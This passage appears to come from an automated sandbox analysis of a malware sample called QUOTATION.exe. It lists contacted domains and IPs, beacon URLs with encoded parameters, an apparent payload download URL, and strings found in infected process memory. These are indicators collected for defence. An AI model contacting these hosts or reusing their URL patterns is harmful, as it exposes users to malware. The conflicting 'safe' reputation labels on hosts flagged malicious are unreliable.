              		2.57.90.16
              		truetrue
                		unknown
                bb.zhanghonghong.com
                		154.215.156.6
                		truetrue
                  		unknown
                  www.solya-shop.com
                  		217.160.0.217
                  		truetrue
                    		unknown
                    www.funvacayflorida.com
                    		208.91.197.91
                    		truetrue
                      		unknown
                      www.aznqmd.com
                      		23.83.160.9
                      		truetrue
                        		unknown
                        www.b-tek.media
                        		91.184.0.24
                        		truetrue
                          		unknown
                          www.dexmart.xyz
                          		199.192.26.35
                          		truetrue
                            		unknown
                            www.texasgent.com
                            		81.17.29.148
                            		truetrue
                              		unknown
                              www.maxhaidt.com
                              		104.21.45.96
                              		truetrue
                                		unknown
                                www.wittofitentertainment.com
                                		162.240.73.101
                                		truefalse
                                  		unknown
                                  flaviosilva.online
                                  		2.57.90.16
                                  		truetrue
                                    		unknown
                                    www.interactive-media.ru
                                    		88.212.206.251
                                    		truetrue
                                      		unknown
                                      www.brightfms.com
                                      		81.17.18.196
                                      		truetrue
                                        		unknown
                                        www.flaviosilva.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.184411.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.eta-trader.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.finelinetackdirect.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.ghostdyes.net
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.solya-shop.com/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dexmart.xyz/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.184411.com/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.b-tek.media/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dexmart.xyz/d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.interactive-media.ru/d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.ghostdyes.net/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.funvacayflorida.com/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.solya-shop.com/d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.texasgent.com/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.brightfms.com/d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cardinialethanol.com/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.aznqmd.com/d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.texasgent.com/d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.cardinialethanol.com/d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGmtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.flaviosilva.online/d91r/true
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.eta-trader.netwww.funvacayflorida.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/chrome_newtabhelp.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drfalse
                                                    		high
                                                    https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchhelp.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drfalse
                                                      		high
                                                      http://www.184411.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.texasgent.comwww.brightfms.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/ac/?q=help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drfalse
                                                        		high
                                                        http://www.popularartprints.orgTexplorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.interactive-media.ru/d91r/explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.184411.com/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000009.00000000.4217880966.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6463260519.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4743238865.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6120364620.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8026780659.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6283225298.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://schemas.microsoft.cexplorer.exe, 00000009.00000002.8021127369.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000009.00000003.4747263289.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.00000000106FF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://excel.office.comexplorer.exe, 00000009.00000000.4217880966.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.buymyenergy.com/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDQUOTATION.exe, 00000008.00000001.3526150899.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                		high
                                                                http://www.gopher.ftp://ftp.QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fantasticserver.yachts/d91r/explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.finelinetackdirect.com/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.msn.com/en-us/newexplorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.maxhaidt.com/d91r/8H7gL=Bxcfm_qbbEGmexplorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drfalse
                                                                        		high
                                                                        http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPtQiCFpqnDhHGDoChelp.exe, 0000000A.00000002.8005674246.00000000058C4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.popularartprints.org/d91r/ldE8Xu=oYWDxG4UFF1explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindowfirefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.dexmart.xyzwww.finelinetackdirect.comexplorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppatexplorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.eta-trader.netexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssexplorer.exe, 00000009.00000002.8041134967.0000000015174000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004C34000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.maxhaidt.comwww.aznqmd.comexplorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://wns.windows.com/explorer.exe, 00000009.00000002.8021127369.000000000D39C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D39C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D39C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.wittofitentertainment.com/VeHZpcMYNF28.bin(QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.webnames.ru/wn/img/logo-horizontal.svgexplorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.dhiyasecurities.comwww.popularartprints.orgexplorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.solya-shop.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8016192740.000000000AF24000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.solya-shop.comwww.buymyenergy.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.www.fantasticserver.yachtsexplorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.finelinetackdirect.comwww.maxhaidt.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://trade.webnames.ruexplorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.brightfms.comwww.eta-trader.netexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.popularartprints.org/d91r/explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drfalse
                                                                                            		high
                                                                                            http://nsis.sf.net/NSIS_ErrorErrorQUOTATION.exefalse
                                                                                              		high
                                                                                              http://www.brightfms.com/d91r/?8H7gL=Bxcfm_qbbEGm&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdexplorer.exe, 00000009.00000002.8041134967.0000000015AE0000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000055A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.ghostdyes.netexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.b-tek.mediawww.dexmart.xyzexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.symauth.com/cps0(QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drfalse
                                                                                                		high
                                                                                                https://outlook.comexplorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_cexplorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppbexplorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://nsis.sf.net/NSIS_ErrorQUOTATION.exefalse
                                                                                                          		high
                                                                                                          http://www.symauth.com/rpa00QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drfalse
                                                                                                            		high
                                                                                                            https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000003.4747873788.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6122981294.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D3F5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.nero.comQUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drfalse
                                                                                                                		high
                                                                                                                http://www.brightfms.comexplorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
